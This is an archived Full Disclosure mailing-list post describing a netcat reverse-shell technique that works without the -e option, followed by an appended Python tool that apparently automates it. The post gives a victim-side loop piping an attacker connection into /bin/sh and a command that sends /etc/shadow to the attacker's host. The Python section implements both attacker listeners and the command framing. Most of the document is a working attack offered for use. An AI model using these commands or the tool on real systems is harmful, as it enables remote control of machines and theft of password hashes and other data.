Full Disclosure mailing list archives

Reverse Shell Without Enabling Netcat's "GAPING_SECURITY_HOLE"
From: 545945 <545945 () gmail com>
Date: Fri, 19 Sep 2008 18:01:23 -0400

     Recently a friend of mine asked me a seemingly simple question: what
is the easiest method to get a reverse shell from a *nix based system using
Netcat?  He then added a caveat, that he did not want to worry about
recompiling the source to enable the "GAPING_SECURITY_HOLE" option that
allows you to bind a shell using "-e".  My first thought was to say "Dude go
check Google and stop bothering me with this piddly shit", however I have in
the past had this same discussion with others and trying to construct a
Google search string and get meaningful results on this subject can prove
very irritating.  Because of this I gave in and told him the method I use
which is laid out below.  I then had the thought that I should post it
somewhere else so it was a little easier for the next person to find.  I say
"somewhere else" because I can only assume that I am not the first person to
post this method.

     While the method below does not provide a "TRUE" interactive shell it
is the next best thing and is more than suitable for most hacking
endeavours, including simple interactive steps like setting passwords.  I
know there are other methods out there but I like this one as it provides an
easy method without worrying if any particular scripting language was
installed or the proper options were compiled in with the default shell.
There will undoubtedly be debate on what the best ports are to use and
whether or not this is even a recommended way to do things.  I chose ports
53 & 80 as they are the ones that I find have the most success at getting
out of a network untouched.  As with all things any number of factors can
get in the way of proper communication using this method.

STEP (1)
On the attacker host, open the terminal window in which you want to receive
the output of your commands, and run:
     "nc -k -v -l 80"

STEP (2)
On the attacker host, open the terminal window in which you want to type
your commands, and run:
     "nc -k -v -l 53"

STEP (3)
On the victim host, run:
     "while true ; do nc <Attacker_IP> 53 | /bin/sh ; done"

The "-k" (keep listening after a client disconnects) and "-l <port>" forms
above are OpenBSD netcat syntax.  Traditional netcat spells a listener
"nc -v -l -p 80" and has no "-k", so there each listener needs the same kind
of "while true" loop that STEP (3) puts around the client.

You should then see a message appear in the window opened in STEP (2)
similar to - "Connection from <Victim_IP> port 53 accepted"

NOTE:  I use the "-k" options and "while loops" in these steps to ensure
that if there is any intermittent communication issues I don't have to
re-establish any of the sessions.

     Assuming that there are no communication issues like firewalls,
routing, DNS, PEBCAK errors, etc. getting in the way, the command you
entered in STEP (3) will connect to the session started in STEP (2).  "Great,
now what?" you ask.  Well, all you do is enter the commands you want to run
in the STEP (2) window using the formatting below, and the output will
display in the window opened for STEP (1).

Syntax :   <command> | nc <Attacker_IP> 80

Example:   cat /etc/shadow | nc <Attacker_IP> 80

Only what you explicitly pipe into port 80 comes back.  The stdout and
stderr of the /bin/sh started in STEP (3) are inherited from the loop on the
victim (its terminal, or wherever that loop's output points), so a command
typed without the trailing "| nc <Attacker_IP> 80" runs but shows you
nothing, and error messages only come back if you redirect them too:
"<command> 2>&1 | nc <Attacker_IP> 80".  Each piped command opens a new
connection to port 80 and closes it when the output ends, which is why that
listener has to keep accepting connections.

There are lots of variations on this using multiple hosts and single ports
but I leave that up to you to experiment.  That's it and happy hunting...
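The three-step procedure above, worked through as an added example that is not code from the post: a small Python 3 console that plays the attacker side of both listeners and automates the `<command> | nc <Attacker_IP> 80` framing, plus an emulated victim that hands its command socket to `/bin/sh` as stdin, exactly as `nc <Attacker_IP> 53 | /bin/sh` does. Assumptions, all mine: everything runs on loopback (127.0.0.1) on free unprivileged ports instead of 53 and 80, and the victim-side `nc` client is replaced by a Python one-liner (`PY_SENDER`) so the demo does not depend on which netcat variant is installed or on how it behaves at stdin EOF. `listener`, `frame_command`, `run_remote`, `victim` and `demo` are names I chose.

```python
#!/usr/bin/env python3
"""Two-channel command/output shell in the style of the post: commands leave
on one port, results come back on another, and the victim side needs only
`nc <ip> <port> | /bin/sh` (no -e, no GAPING_SECURITY_HOLE build).
Added example, not the post's own code."""
import socket
import subprocess
import sys
import threading

HOST = "127.0.0.1"   # assumption: loopback demo; for real use bind the attacker IP


def listener(port):
    """Stand-in for the post's `nc -k -v -l <port>`: a listening socket that
    keeps accepting connections until closed.  port=0 picks a free port."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((HOST, port))
    s.listen(5)
    return s


def frame_command(command, attacker_ip, out_port, sender="nc {ip} {port}"):
    """The line typed in the STEP (2) window: `<command> | nc <Attacker_IP> 80`.
    `sender` is the pipe target; the default is the post's netcat client."""
    return "%s | %s\n" % (command, sender.format(ip=attacker_ip, port=out_port))


def run_remote(cmd_conn, out_sock, command, sender="nc {ip} {port}", timeout=5.0):
    """Push one command down the command channel, then collect what the victim
    sends back on the output channel.  Every command opens a fresh connection
    to the output port, which is why that listener must keep accepting."""
    attacker_ip, out_port = out_sock.getsockname()
    cmd_conn.sendall(frame_command(command, attacker_ip, out_port, sender).encode())
    out_sock.settimeout(timeout)
    conn, _ = out_sock.accept()
    chunks = []
    with conn:
        while True:
            data = conn.recv(4096)
            if not data:          # victim's sender hit EOF on its stdin and closed
                break
            chunks.append(data)
    return b"".join(chunks)


# Assumed victim-side stand-in for `nc <ip> <port>`, so the demo does not
# depend on which netcat variant is installed (they differ at stdin EOF).
PY_SENDER = (sys.executable + " -c \"import socket,sys;"
             "s=socket.create_connection(('{ip}',{port}));"
             "s.sendall(sys.stdin.buffer.read());s.close()\"")


def victim(cmd_port):
    """STEP (3) on the victim: `nc <Attacker_IP> 53 | /bin/sh`, emulated by
    handing the command socket to /bin/sh as its stdin.  sh's own stdout is
    discarded here (on a real victim: its terminal), so nothing comes back
    unless the command itself pipes into the output port."""
    sock = socket.create_connection((HOST, cmd_port))
    proc = subprocess.Popen(["/bin/sh"], stdin=sock.fileno(),
                            stdout=subprocess.DEVNULL)
    sock.close()          # sh holds its own copy of the descriptor
    proc.wait()           # exits when the attacker closes the command channel


def demo(commands, cmd_port=0, out_port=0):
    """Run the whole exchange on loopback and return {command: output bytes}.
    The post uses ports 53 and 80; 0 here picks free unprivileged ports."""
    cmd_sock, out_sock = listener(cmd_port), listener(out_port)
    t = threading.Thread(target=victim, args=(cmd_sock.getsockname()[1],),
                         daemon=True)
    t.start()
    cmd_sock.settimeout(5.0)
    cmd_conn, _ = cmd_sock.accept()    # the "Connection from ... accepted" moment
    results = {}
    with cmd_conn:                     # closing this is EOF for the victim's sh
        for command in commands:
            results[command] = run_remote(cmd_conn, out_sock, command,
                                          sender=PY_SENDER)
    t.join(5.0)
    cmd_sock.close()
    out_sock.close()
    return results


if __name__ == "__main__":
    for command, out in demo(["id", "uname -a"]).items():
        print("$ %s\n%s" % (command, out.decode(errors="replace")), end="")
```

Running it prints the output of `id` and `uname -a` as collected over the output channel. What the emulated victim makes visible is the property of the method that trips people up: `/bin/sh`'s own stdout never reaches the attacker, so a command sent without the trailing pipe into the output port runs but returns nothing, and every command that does pipe opens and closes a new connection to that port, which is the reason the output listener must keep accepting (`-k` on OpenBSD netcat, or a loop elsewhere).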

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
